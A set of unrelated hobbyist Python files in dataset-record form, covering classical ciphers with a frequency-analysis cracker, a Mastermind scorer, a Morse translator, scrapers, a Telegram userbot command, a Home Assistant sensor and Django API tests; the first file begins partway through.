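\n# Example added for illustration -- the XOR pad round-trips, so encrypting twice\n# with the same key recovers the plaintext:\n#     >>> c = bitOtp('1010', '0110')   # '1100'\n#     >>> bitOtp(c, '0110')\n#     '1010'\n\n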
def playfair(m: str, key: str) -> str:\n    # TODO: 1) implement decryption, 2) optimize code, 3) deal with key has I/J, 4) fix bugs\n    '''Playfair Ciphers'''\n    assert len(key) <= 25, \"Keys longer than 25 letters are not supported for now.\"\n    assert 'I' not in key and 'i' not in key and 'J' not in key and 'j' not in key, \"Not support key with 'i' or 'j' for now.\"\n\n    # Build table\n    key = key.upper()\n    table = list(key)\n\n    for i in range(ord('A'), ord('Z')+1):\n        c = chr(i)\n\n        # Deal with 'I/J'\n        if c == 'I' or c == 'J':\n            # if key has I or J\n            if 'I' in key or 'J' in key:\n                continue\n            # if key has neither I nor J\n            elif c == 'J':  # if curr char is J\n                continue\n            else:  # if curr char is I\n                pass\n\n        if c not in key:\n            table.append(c)\n\n    # Main\n    filler = 'X'\n    m = m.upper()  # the table is upper-case, so normalize the message\n    res = ''\n    for i in range(0, len(m), 2):\n        pair = list(m[i:i+2])  # a list, so individual letters can be replaced\n        if len(pair) == 1:  # pad an odd-length message\n            pair.append(filler)\n        if pair[0] == pair[1]:\n            pair[1] = filler\n\n        i1, i2 = table.index(pair[0]), table.index(pair[1])\n        # If pair in the same row\n\n        def sameRow(a: int, b: int) -> bool:\n            return int(a / 5) == int(b / 5)\n        if sameRow(i1, i2):\n            newI1, newI2 = i1+1, i2+1\n            if not sameRow(i1, newI1):\n                newI1 -= 5\n            if not sameRow(i2, newI2):\n                newI2 -= 5\n            pair[0] = table[newI1]\n            pair[1] = table[newI2]\n\n        # If pair in the same column\n        elif i1 % 5 == i2 % 5:\n            pair[0] = table[(i1+5) % 25]\n            pair[1] = table[(i2+5) % 25]\n\n        # Otherwise\n        else:\n            # row(newI1) = row(i1), col(newI1) = col(i2). Same to newI2\n            rw = int(i1 / 5)\n            for i in range(5*rw, 5*rw+5):\n                if i % 5 == i2 % 5:\n                    pair[0] = table[i]\n\n            rw = int(i2 / 5)\n            for i in range(5*rw, 5*rw+5):\n                if i % 5 == i1 % 5:\n                    pair[1] = table[i]\n\n        res += ''.join(pair)\n\n    return res\n\n\ndef freqAttack(ciphertext: str, specialMap: dict) -> str:\n    # TODO: allow hardcoded special map\n    '''Try statistical cryptanalysis to crack the ciphertext.'''\n    letterFreq = dict(zip(\n        'abcdefghijklmnopqrstuvwxyz',\n        [\n            8.2, 1.5, 2.8, 4.3, 12.7,\n            2.2, 2.0, 6.1, 7.0, 0.2,\n            0.8, 4.0, 2.4, 6.7, 7.5,\n            1.9, 0.1, 6.0, 6.3, 9.1,\n            2.8, 1.0, 2.4, 0.2, 2.0,\n            0.1\n        ]\n    ))\n\n    # e t a o i n s h r d l c u m w f g y p b v k j x q z\n    orderLetterFreq = [c for c, _ in sorted(\n        letterFreq.items(), key=lambda item: item[1], reverse=True)]\n    # print('English freq:', ' '.join(orderLetterFreq))\n    print('English freq: ', end='')\n    for e in orderLetterFreq:\n        print('{} '.format(e), end='')\n    print()\n\n    textFreq = {}\n    for c in ciphertext:\n        if not c.isalnum():\n            continue\n        if c in textFreq.keys():\n            textFreq[c] += 1\n        else:\n            textFreq[c] = 1\n    orderedTextFreq = dict(sorted(\n        textFreq.items(), key=lambda item: item[1], reverse=True))\n    # print('Text freq   :', ' '.join(orderedTextFreq.keys()))\n    print('Text freq   : ', end='')\n    for e in orderedTextFreq.keys():\n        print('{} '.format(e), end='')\n    print()\n    # print('Appear count:', ' '.join([str(v) for v in orderedTextFreq.values()]))\n    print('Appear count: ', end='')\n    for e in orderedTextFreq.values():\n        print('{:>2} '.format(e), end='')\n    print()\n\n    orderedTextFreq = list(orderedTextFreq.keys())\n    crackMap = dict(zip(orderedTextFreq, orderLetterFreq))\n    symbols = ' !@#$%^&*(),./;\\'[]\\\\<>?:\"{}|`~'\n    # return ''.join([crackMap[c] if c not in symbols else c for c in ciphertext])\n\n    res = ''\n    for c in ciphertext:\n        if c in symbols:\n            res += c\n        else:\n            res += crackMap[c]\n\n    return res\n\n\nif __name__ == '__main__':\n    plaintext = 'I love eating 114514 apples.'\n\n    def pRes(cipherName, encrypted, decrypted, plaintext=plaintext):\n        print(f\"===== {cipherName} =====\")\n        print(\"Plaintext:\", plaintext)\n        print(\"Encrypted:\", encrypted)\n        print(\"Decrypted:\", decrypted)\n        print(\"Success :)\" if decrypted == plaintext else \"Failed ;(\")\n        print()\n\n    def testCaesar():\n        enc = caesar(plaintext, 3)\n        dec = 
caesar(enc, -3)\n pRes('Caesar Cipher', enc, dec)\n # testCaesar()/\n\n def testMonoalpha():\n mapfrom = 'abcdefghijklmnopqrstuvwxyz1234567890' + \\\n 'abcdefghijklmnopqrstuvwxyz1234567890'.upper()\n mapto = 'DKVQFIBJWPESCXHTMYAUOLRGZN!@#$%^&*()'.lower() + \\\n 'DKVQFIBJWPESCXHTMYAUOLRGZN!@#$%^&*()'\n enc = monoalpha(plaintext, mapfrom, mapto)\n dec = monoalpha(enc, mapto, mapfrom)\n pRes('Monoalphabetic Substitution Cipher', enc, dec)\n # testMonoalpha()\n\n # TODO: finish this\n def testVigenere():\n text = 'attackatdawn'\n key = 'lemon'\n enc = vigenere(text, key, True)\n dec = vigenere(enc, key, False)\n pRes('Vigenere Cipher', enc, dec, text.upper())\n # testVigenere()\n\n def testFreqAttack():\n ciphertext = 'BQWE UQPY LOKATNEP Q LVFPTWQX \\\nMQOOTEO JK BXHTNP QZN XQORE LQOJTWXE NOKLXEJP PHORTWQX \\\nUQPY TP Q JFLE KB BQWE UQPY WKUUKZXF HPEN SVEZ HPEN \\\nLOKLEOXF PHORTWQX UQPYP WQZ LOEAEZJ TZBEWJTKZP \\\nJOQZPUTJJEN MF OEPLTOQJKOF NOKLXEJP'\n # print(freqAttack(ciphertext, {}))\n freqAttack(ciphertext, {})\n # testFreqAttack()\n\n # print(playfair('balloon', 'monarchy'))\n","repo_name":"X3vvv/cryptology","sub_path":"classicalCiphers.py","file_name":"classicalCiphers.py","file_ext":"py","file_size_in_byte":8934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23220591850","text":"\"\"\"\nMastermind\nThe classic game of Mastermind is played on a tray on which the Mastermind conceals a code and the Guesser has 10 tries to guess it. The code is a sequence of 4 (or 6, sometimes more) pegs of different colors. Each guess is a corresponding sequence of 4 (or more) pegs of different colors. A guess is \"correct\" when the color of every peg in the guess exactly matches the corresponding peg in the Mastermind's code.\n\nAfter each guess by the Guesser, the Mastermind will give a score comprising black & white pegs, not arranged in any order:\n\nBlack peg == guess peg matches the color of a code peg in the same position.\nWhite peg == guess peg matches the color of a code peg in another position.\nCreate a function that takes two strings, code and guess as arguments, and returns the score in a dictionary.\n\nThe code and guess are strings of numeric digits\nThe color of the pegs are represented by numeric digits\nno \"peg\" may be double-scored\nExamples\nguess_score(\"1423\", \"5678\") ➞ {\"black\": 0, \"white\": 0}\n\nguess_score(\"1423\", \"2222\") ➞ {\"black\": 1, \"white\": 0}\n\nguess_score(\"1423\", \"1234\") ➞ {\"black\": 1, \"white\": 3}\n\nguess_score(\"1423\", \"2211\") ➞ {\"black\": 0, \"white\": 2}\nNotes\nThe code and guess sequences will have the same length.\nThe \"pegs\" consists of only digits from 0-9.\n\"\"\"\ndef guess_score(code, guess):\n a = list(code)\n b = list(guess)\n \n d ={}\n c, e = [], []\n\n for i in range(len(a)):\n if a[i] == b[i]:\n print(\"i\", \"=\",b[i])\n c.append(a[i])\n else:\n if a[i] in b:\n e.append(i) \n \n d = {\"black\": len(c) ,\"white\": len(e) } \n\n return (d)\n\n\n#guess_score(\"1423\", \"5678\") #➞ {\"black\": 0, \"white\": 0}\n#guess_score(\"1423\", \"2222\") #➞ {\"black\": 1, \"white\": 0}\n#guess_score(\"1423\", \"1234\") #➞ {\"black\": 1, \"white\": 3}\nguess_score(\"1423\", \"2211\") #➞ {\"black\": 0, \"white\": 2}\n#guess_score(\"2928\", \"7722\") # {\"black\": 1, \"white\": 1}\n#guess_score(\"4845\", \"6446\") # {\"black\": 1, \"white\": 
1}","repo_name":"mankarali/TRAINING","sub_path":"EXAMPLES/EDABIT/EXPERT/001_100/14_mastermind.py","file_name":"14_mastermind.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"6141537102","text":"#Queston3\n\ndef Merge(l_1, l_2):\n final_list = l_1 + l_2\n final_list.sort()\n return(final_list)\n \nl_1 = [1,2,3,4,5,6]\nl_2 = [3,4,5,6,7,8,10]\nprint(Merge(l_1, l_2))","repo_name":"Changopresto16/Area-Circumference","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73353080096","text":"import argparse\r\nimport os\r\nimport time\r\n\r\nimport tensorflow as tf\r\n\r\nfrom actorCritic import ActorCritic\r\nfrom environment import *\r\nfrom utils import get_checkpoint_path\r\n\r\nenv = Environment()\r\nsession = tf.Session()\r\nagent = ActorCritic(session)\r\n\r\npygame.init() # Intializes the pygame\r\ngames_scores = [] # List that will contain the score of each game played by the gamebot\r\n\r\n\r\nparser = argparse.ArgumentParser(description='DQN-snake testing.')\r\n\r\nparser.add_argument('--numberOfGames', type=int, required=False, default=10,\r\n help='Number of test games.')\r\n\r\nparser.add_argument('--slowDownFactor', type=float, required=False, default=0.06,\r\n help='The factor to make the game slow down. A value of 0 means the games is at full speed.')\r\n\r\nparser.add_argument('--modelName', type=str, required=True,\r\n help='The name of the model.')\r\n\r\n\r\ndef make_agent_play_games(n_games, slow_down_factor):\r\n \"\"\"\r\n Make the agent play a given number of games\r\n\r\n :param n_games: The number of games to play.\r\n :param slow_down_factor: Throttling to make the snake move less rapidly.\r\n :return: A list containing the score of each game played.\r\n \"\"\"\r\n episode = 0\r\n iterations_without_progress = 0\r\n max_without_progress = 200\r\n best_total = 0\r\n\r\n with session as sess:\r\n agent.saver.restore(sess, checkpoint_path) # Restore the model\r\n\r\n while episode < n_games: # Number of games that we want the robot to play\r\n time.sleep(slow_down_factor) # Make the game slow down\r\n\r\n env.render(display=True)\r\n observation = env.screenshot()\r\n cur_state = env.get_last_frames(observation)\r\n\r\n q_values = agent.predict(cur_state)\r\n action = np.argmax(q_values) # Optimal action\r\n\r\n new_state, reward, done = env.step(action)\r\n\r\n # Check if the snake makes progress in the game\r\n if env.snake.total > best_total:\r\n best_total = env.snake.total\r\n iterations_without_progress = 0\r\n else:\r\n iterations_without_progress += 1\r\n # If the snake gets stuck, the game is over\r\n if iterations_without_progress >= max_without_progress:\r\n done = True\r\n\r\n if done: # Game over, start a new game\r\n time.sleep(1)\r\n games_scores.append(env.snake.total)\r\n env.reset()\r\n episode += 1 # Increment the number of games played\r\n iterations_without_progress = 0\r\n best_total = 0\r\n\r\n return games_scores\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n args = parser.parse_args()\r\n\r\n n_games = args.numberOfGames\r\n slow_down_factor = args.slowDownFactor\r\n model_name = args.modelName\r\n checkpoint_path = get_checkpoint_path(model_name=model_name)\r\n\r\n if os.path.isfile(checkpoint_path + \".index\"): # Check to see if the model exists\r\n games_scores = make_agent_play_games(n_games, 
slow_down_factor)\r\n        mean_score = np.mean(games_scores)\r\n        std = np.std(games_scores)\r\n        max_score = np.max(games_scores)\r\n\r\n        print(\"Max score {:.2f}\\tMean score {:.2f}\\tStandard deviation {:.2f} \".format(max_score, mean_score, std))\r\n\r\n    else:\r\n        raise ValueError('Model file does not exist : a model file is required for testing')\r\n","repo_name":"benjamin-dupuis/DQN-snake","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"34"}
+{"seq_id":"8639583956","text":"import re\n\n\ndef getUserInput():\n    text = input(\"input text to translate... \")\n    if (re.search(r'\\d', text)):\n        print('invalid input, please try again')\n        getUserInput()\n    else:\n        translatedText = translate(text)\n        print(translatedText)\n\ndef translate(textToTranslate):\n\n    #creates dictionary for encoding english letters to morse code\n    encodingDictionary = {\n        'A': '.-', 'B':'-...', 'C': '-.-.',\n        'D': '-..', 'E':'.', 'F': '..-.',\n        'G': '--.', 'H':'....', 'I': '..',\n        'J': '.---', 'K':'-.-', 'L': '.-..',\n        'M': '--', 'N':'-.', 'O': '---',\n        'P': '.--.', 'Q':'--.-', 'R': '.-.',\n        'S': '...', 'T':'-', 'U': '..-',\n        'V': '...-', 'W':'.--', 'X': '-..-',\n        'Y': '-.--', 'Z':'--..', ' ': '/',\n    }\n\n    #creates an inverse dictionary to above for decoding morse code to english letters\n    decodingDictionary = {value: key for key,value in encodingDictionary.items()}\n\n    #check to see if text is morse code\n    if re.match('(\\s|-|\\.)+', textToTranslate):\n        #decrypt each morse code letter using dictionary and place in string\n        return ''.join(decodingDictionary[letter] for letter in textToTranslate.split())\n    else:\n        return ' '.join(encodingDictionary[letter] for letter in textToTranslate.upper())\n\nif __name__ == \"__main__\":\n    getUserInput()\n\n","repo_name":"hunnain-atif/morseCodeDecoder","sub_path":"translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"37055641053","text":"from time import sleep\nimport sticker_to_link_dict as sd\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nimport re\n\ndef get_all_prices():\n    driver = webdriver.Firefox()\n    stickers_dict = sd.stickers_dict_all\n    total_price = 0.0\n    to_check = len(stickers_dict)\n    checked = 0\n    for sticker_name in stickers_dict.keys():\n        link = get_link(sticker_name)\n        driver.get(link)\n        try:\n            price_text = driver.find_element_by_class_name(\"normal_price\").text\n        except NoSuchElementException:\n            while driver.find_elements_by_id(\"message\") and driver.find_element_by_id(\"message\").text[0:6] == \"Sorry!\":\n                print(\"Too many requests! 
Retrying in 60 seconds...\")\n sleep(60)\n print(\"Retrying...\")\n driver.get(link)\n finally:\n price_text = driver.find_element_by_class_name(\"normal_price\").text\n print(price_text)\n price = float(format(float((re.split(\" \", price_text)[2][1:]).replace(',', '')), '.2f'))\n stickers_dict[sticker_name].append(price)\n checked += 1\n print(\"checked \" + str(checked) + \" out of \" + str(to_check))\n total_price += float(format(stickers_dict[sticker_name][0] * price, '.2f'))\n driver.quit()\n return stickers_dict, str(total_price)\n\n\ndef get_link(sticker_name):\n link_base = \"https://steamcommunity.com/market/search?appid=730&q=\"\n search_query = sticker_name.replace(\" \", \"+\")\n return link_base + search_query\n","repo_name":"Gyanoo/Steam_items_price_checker","sub_path":"get_all_prices.py","file_name":"get_all_prices.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16314493026","text":"import time\n\nfrom fipper import Client, __version__ as fip_ver\nfrom fipper.types import Message\nfrom platform import python_version\n\nfrom pyAyiin import __version__, ayiin_ver\nfrom pyAyiin import CMD_HELP, HOSTED_ON, adB\nfrom pyAyiin.decorator import Ayiin\n\n\nfrom . import *\n\n\n@Ayiin([\"alive\", \"yins\"])\nasync def aliveme(client: Client, message: Message):\n chat_id = message.chat.id\n user = await client.get_me()\n output = (\n f\"**Tʜᴇ [Ayiin Ubot](https://github.com/AyiinXd/AyiinUbot)**\\n\\n\"\n f\"**{var.ALIVE_TEXT}**\\n\\n\"\n f\"╭✠╼━━━━━━━━━━━━━━━✠╮\\n\"\n f\"≽ **Bᴀsᴇ Oɴ :** •[{adB.name}]•\\n\"\n f\"≽ **Oᴡɴᴇʀ :** [{user.first_name}](tg://user?id={user.id}) \\n\"\n f\"≽ **Mᴏᴅᴜʟᴇs :** `{len(CMD_HELP)} Modules` \\n\"\n f\"≽ **Pʏᴛʜᴏɴ Vᴇʀsɪᴏɴ :** `{python_version()}`\\n\"\n f\"≽ **Pʏʀᴏɢʀᴀᴍ Vᴇʀsɪᴏɴ :** `{fip_ver}`\\n\"\n f\"≽ **Pʏ-Aʏɪɪɴ Vᴇʀsɪᴏɴ :** `{__version__}`\\n\"\n f\"≽ **Aʏɪɪɴ Vᴇʀsɪᴏɴ :** `{ayiin_ver}` [{HOSTED_ON}]\\n\"\n \"╰✠╼━━━━━━━━━━━━━━━✠╯\\n\\n\"\n )\n await message.delete()\n try:\n if var.ALIVE_PIC:\n endsw = (\".mp4\", \".gif\")\n if var.ALIVE_PIC.endswith(endsw):\n await client.send_video(chat_id=chat_id, video=var.ALIVE_PIC, caption=output)\n else:\n await client.send_photo(chat_id=chat_id, photo=var.ALIVE_PIC, caption=output)\n else:\n await message.reply_text(output)\n except BaseException as xd:\n await message.reply(xd)\n\n\nCMD_HELP.update(\n {\"alive\": (\n \"alive\",\n {\n \"alive\": \"Chech Your Userbot.\",\n }\n )\n }\n)\n","repo_name":"Arsyabot/ayiin","sub_path":"AyiinXd/alive.py","file_name":"alive.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23901481877","text":"import unittest\nimport requests\nimport copy\nfrom test_base import TestBase\n\nfrom apps.projects.models import Project\nfrom apps.ml.models import MLExperiment\nfrom apps.ml.models import MLModel\nfrom apps.accounts.models import MljarUser, Organization\n\n\nclass TestMLModel(TestBase):\n def test_create_mlmodel(self):\n token = self.create_user_and_login(self.user1_params)\n # should be empty\n organization = Organization.objects.get(slug=self.org1)\n user = MljarUser.objects.get(email=self.user1_params[\"email\"])\n project = Project(\n title=\"some title\",\n description=\"...\",\n created_by=user,\n parent_organization=organization,\n )\n project.save()\n\n ml_experiment = MLExperiment(\n title=\"exp1\",\n description=\"desc\",\n params={},\n column_usage={},\n 
created_by=user,\n            parent_organization=organization,\n            parent_project=project,\n        )\n        ml_experiment.save()\n\n        ml_model = MLModel(\n            model_key=\"exp1\",\n            created_by=user,\n            parent_organization=organization,\n            parent_project=project,\n            parent_experiment=ml_experiment,\n            model_type=\"some_ml_model\",\n            params={},\n            training_details={},\n            training_time=1,\n            metric={},\n            status=\"created\",\n            errors={},\n            task_id=\"\",\n        )\n        ml_model.save()\n\n        self.assertEqual(len(MLModel.objects.all()), 1)\n        # POST on MLModels is not allowed (HTTP 405)\n        ml_model = self.request(\n            \"post\",\n            \"/api/v1/{0}/{1}/ml_models\".format(self.org1, project.id),\n            {},\n            token,\n            405,\n        )\n        ml_models = self.request(\n            \"get\",\n            \"/api/v1/{0}/{1}/ml_models\".format(self.org1, project.id),\n            {},\n            token,\n            200,\n        )\n        self.assertEqual(len(ml_models), 1)\n        self.assertEqual(ml_models[0][\"model_key\"], \"exp1\")\n","repo_name":"snandasena/mljar","sub_path":"backend/tests/tests_api/test_mlmodel.py","file_name":"test_mlmodel.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"25350186754","text":"# If the purchase value is V=45 and the number of installments is P=7, then the installments will be: 7, 7, 7, 6, 6, 6 and 6. That\n# is, since the remainder of dividing 45 by 7 is 3, the first 3 installments must be one real higher than the final 4\n# installments. You need to help Pedrinho and write a program that, given the purchase value and the number of installments,\n# prints the value of each installment. The program receives as input the value V, representing the purchase value, and\n# the value P, indicating the number of installments. The output must be the installments.\n\ncompra = float(input(\"Enter the purchase value: \"))\nparcelas = int(input(\"Enter the number of installments: \"))\n\nif(parcelas <=18):\n    if(compra % parcelas == 0):\n        valor_parcela = compra / parcelas\n        print(\"The purchase can be split into\", parcelas, \"installments of R$\", valor_parcela)\n    else:\n        numero_parcela_inicias = compra % parcelas\n        valor_parcelas_iniciais = (compra // parcelas) + 1\n        numero_parcela_restante = parcelas - numero_parcela_inicias\n        valor_parcelas_finais = compra // parcelas\n\n        print(\"The purchase can be split into\", int(numero_parcela_inicias), \"initial installments of R$\",\n              valor_parcelas_iniciais, \"and\", int(numero_parcela_restante), \"of R$\", valor_parcelas_finais)\nelse:\n    print(\"The number of installments is invalid!\")","repo_name":"LyndainesSantos/DataScienceClass","sub_path":"python_condicionais/exercicio_17.py","file_name":"exercicio_17.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
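The installment arithmetic in the exercise above reduces to a single divmod: the remainder of V by P says how many leading installments are one real larger. A minimal standalone sketch (the function name `split_installments` is mine, not part of the exercise):

def split_installments(total, n):
    # divmod yields the base installment and how many installments get one unit more
    base, larger = divmod(int(total), n)
    return [base + 1] * larger + [base] * (n - larger)

assert split_installments(45, 7) == [7, 7, 7, 6, 6, 6, 6]
assert sum(split_installments(45, 7)) == 45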
+{"seq_id":"9224139787","text":"import unittest\nfrom dataCollection import DataCollection\nfrom book_scraper import BookScraper\nfrom author_scraper import AuthorScraper\nimport os \nfrom dotenv import load_dotenv\nload_dotenv()\n\nclass TestScraper(unittest.TestCase):\n    def setUp(self):\n        self.testDB = DataCollection(os.getenv('MONGO_CONNECTION_STRING'), \"testDatabase\", \"testCollection\")\n        self.bookScraper = BookScraper(self.testDB)\n        self.authorScraper = AuthorScraper(self.testDB)\n    \n    def testBookScraper(self):\n        self.testDB.empty_data_collection()\n        testurl = \"https://www.goodreads.com/book/show/6185.Wuthering_Heights\"\n        self.bookScraper.scrape_one_book(testurl)\n        self.assertEqual(1, self.testDB.get_collection_size())\n\n    def testAuthorScraper(self):\n        self.testDB.empty_data_collection()\n        testurl = \"https://www.goodreads.com/author/show/6485178.Fredrik_Backman\"\n        self.authorScraper.scrape_one_author(testurl)\n        self.assertEqual(1, self.testDB.get_collection_size())\n\nif __name__ == '__main__':\n    unittest.main()","repo_name":"Roxanne1225/goodReadsScraper","sub_path":"server/testScraper.py","file_name":"testScraper.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"31326583964","text":"from datetime import timedelta\r\nimport logging\r\n\r\nfrom homeassistant.components.sensor import (\r\n    SensorDeviceClass,\r\n    SensorEntity,\r\n    SensorStateClass,\r\n)\r\nfrom homeassistant.const import UV_INDEX\r\nfrom homeassistant.core import HomeAssistant\r\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\r\nfrom homeassistant.helpers.typing import ConfigType, DiscoveryInfoType\r\n\r\nfrom .const import DOMAIN\r\n\r\nSCAN_INTERVAL = timedelta(hours=1)\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nasync def async_setup_platform(\r\n    hass: HomeAssistant,\r\n    config: ConfigType,\r\n    async_add_entities: AddEntitiesCallback,\r\n    discovery_info: DiscoveryInfoType | None = None\r\n) -> None:\r\n    \"\"\"Set up the sensor platform.\"\"\"\r\n    async_add_entities([EPA_AirQuality_HA()])\r\n\r\nasync def async_setup_entry(hass, config_entry, async_add_devices):\r\n    \"\"\"Set up the sensor from a config entry.\"\"\"\r\n    async_add_devices([EPA_AirQuality_HA(hass.data[DOMAIN][config_entry.entry_id])])\r\n\r\n\r\nclass EPA_AirQuality_HA(SensorEntity):\r\n    \"\"\"Representation of a Sensor.\"\"\"\r\n\r\n    _attr_name = \"Air Quality\"\r\n    _attr_native_unit_of_measurement = UV_INDEX\r\n    _attr_state_class = SensorStateClass.MEASUREMENT\r\n\r\n    def __init__(self, api) -> None:\r\n        self.api = api\r\n        self._attr_unique_id = \"{suburb}_airquality\".format(suburb=api.suburb)\r\n\r\n    async def async_update(self) -> None:\r\n        \"\"\"Fetch new state data for the sensor.\r\n        This is the only method that should fetch new data for Home Assistant.\r\n        \"\"\"\r\n        self._attr_native_value = await self.api.async_get_daily_uvindex()\r\n    \r\n    async def async_added_to_hass(self) -> None:\r\n        await self.async_update()\r\n","repo_name":"loryanstrant/EPA_AirQuality_HA","sub_path":"custom_components/EPA_AirQuality_HA/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"24619351501","text":"import os\nfrom unittest import skip\n\nfrom django.test import TestCase\nfrom django_rq import get_worker\nfrom rest_framework.test import APIClient\n\nfrom api.models import User\n\nsamplephotos_dir = os.path.abspath(\"samplephotos\")\n\n\n@skip(\"broken\")\nclass ScanPhotosTestCase(TestCase):\n    def setUp(self):\n        self.client_admin = APIClient()\n\n        self.client_users = [APIClient() for _ in range(2)]\n\n        User.objects.create_superuser(\n            \"test_admin\", \"test_admin@test.com\", \"test_password\"\n        )\n        admin_auth_res = self.client_admin.post(\n            \"/api/auth/token/obtain/\",\n            {\n                \"username\": \"test_admin\",\n                \"password\": \"test_password\",\n            },\n        )\n        self.client_admin.credentials(\n            HTTP_AUTHORIZATION=\"Bearer \" + admin_auth_res.json()[\"access\"]\n        )\n\n        # enable signup as admin\n        change_settings_res = self.client_admin.post(\n            \"/api/sitesettings/\", 
{\"allow_registration\": True}\n )\n self.assertEqual(change_settings_res.json()[\"allow_registration\"], \"True\")\n self.assertEqual(change_settings_res.status_code, 200)\n\n logged_in_clients = []\n\n # sign up 6 test users\n user_ids = []\n\n for idx, client in enumerate(self.client_users):\n create_user_res = client.post(\n \"/api/user/\",\n {\n \"email\": \"test_user_{}@test.com\".format(idx),\n \"username\": \"test_user_{}\".format(idx),\n \"password\": \"test_password\",\n },\n )\n\n self.assertEqual(create_user_res.status_code, 201)\n user_ids.append(create_user_res.json()[\"id\"])\n\n login_user_res = client.post(\n \"/api/auth/token/obtain/\",\n {\n \"username\": \"test_user_{}\".format(idx),\n \"password\": \"test_password\",\n },\n )\n self.assertEqual(login_user_res.status_code, 200)\n\n client.credentials(\n HTTP_AUTHORIZATION=\"Bearer \" + login_user_res.json()[\"access\"]\n )\n logged_in_clients.append(client)\n self.client_users = logged_in_clients\n\n # set scan directories for each user as admin\n for idx, (user_id, client) in enumerate(zip(user_ids, self.client_users)):\n user_scan_directory = os.path.join(samplephotos_dir, \"test{}\".format(idx))\n self.assertNotEqual(user_scan_directory, \"\")\n patch_res = self.client_admin.patch(\n \"/api/manage/user/{}/\".format(user_id),\n {\"scan_directory\": user_scan_directory},\n )\n self.assertEqual(patch_res.json(), {})\n self.assertEqual(patch_res.status_code, 200)\n self.assertEqual(patch_res.json()[\"scan_directory\"], user_scan_directory)\n\n # make sure users are logged in\n for client in self.client_users:\n res = client.get(\"/api/photos/\")\n self.assertEqual(res.status_code, 200)\n\n # scan photos\n scan_photos_res = self.client_users[0].get(\"/api/scanphotos/\")\n self.assertEqual(scan_photos_res.status_code, 200)\n get_worker().work(burst=True)\n\n # make sure photos are imported\n get_photos_res = self.client_users[0].get(\"/api/photos/\")\n self.assertEqual(get_photos_res.status_code, 200)\n self.assertTrue(len(get_photos_res.json()[\"results\"]) > 0)\n\n # try scanning again and make sure there are no duplicate imports\n num_photos = len(get_photos_res.json()[\"results\"])\n scan_photos_res = self.client_users[0].get(\"/api/scanphotos/\")\n self.assertEqual(scan_photos_res.status_code, 200)\n get_worker().work(burst=True)\n get_photos_res = self.client_users[0].get(\"/api/photos/\")\n self.assertEqual(get_photos_res.status_code, 200)\n self.assertEqual(len(get_photos_res.json()[\"results\"]), num_photos)\n\n def test_auto_albums(self):\n \"\"\"make sure user can make auto albums, list and retrieve them\"\"\"\n # make auto albums\n auto_album_gen_res = self.client_users[0].get(\"/api/autoalbumgen/\")\n self.assertEqual(auto_album_gen_res.status_code, 200)\n get_worker().work(burst=True)\n\n # make sure auto albums are there\n auto_album_list_res = self.client_users[0].get(\"/api/albums/auto/list/\")\n self.assertEqual(auto_album_list_res.status_code, 200)\n\n # make sure user can retrieve each auto album\n for album in auto_album_list_res.json()[\"results\"]:\n auto_album_retrieve_res = self.client_users[0].get(\n \"/api/albums/auto/%d/\" % album[\"id\"]\n )\n self.assertEqual(auto_album_retrieve_res.status_code, 200)\n self.assertTrue(len(auto_album_retrieve_res.json()[\"photos\"]) > 0)\n\n # try making auto albums again and make sure there are no duplicates\n num_auto_albums = len(auto_album_list_res.json()[\"results\"])\n\n auto_album_gen_res = self.client_users[0].get(\"/api/autoalbumgen/\")\n 
self.assertEqual(auto_album_gen_res.status_code, 200)\n        get_worker().work(burst=True)\n\n        auto_album_list_res = self.client_users[0].get(\"/api/albums/auto/list/\")\n        self.assertEqual(len(auto_album_list_res.json()[\"results\"]), num_auto_albums)\n\n    def test_place_albums(self):\n        \"\"\"make sure user can list and retrieve place albums\"\"\"\n        place_album_list_res = self.client_users[0].get(\"/api/albums/place/list/\")\n        self.assertEqual(place_album_list_res.status_code, 200)\n\n        for album in place_album_list_res.json()[\"results\"]:\n            place_album_retrieve_res = self.client_users[0].get(\n                \"/api/albums/place/%d/\" % album[\"id\"]\n            )\n            self.assertEqual(place_album_retrieve_res.status_code, 200)\n\n    def test_thing_albums(self):\n        \"\"\"make sure user can list and retrieve thing albums\"\"\"\n        thing_album_list_res = self.client_users[0].get(\"/api/albums/thing/list/\")\n        self.assertEqual(thing_album_list_res.status_code, 200)\n\n        for album in thing_album_list_res.json()[\"results\"]:\n            thing_album_retrieve_res = self.client_users[0].get(\n                \"/api/albums/thing/%d/\" % album[\"id\"]\n            )\n            self.assertEqual(thing_album_retrieve_res.status_code, 200)\n","repo_name":"kally788/librephotos","sub_path":"api/tests/test_scan_photos.py","file_name":"test_scan_photos.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"}
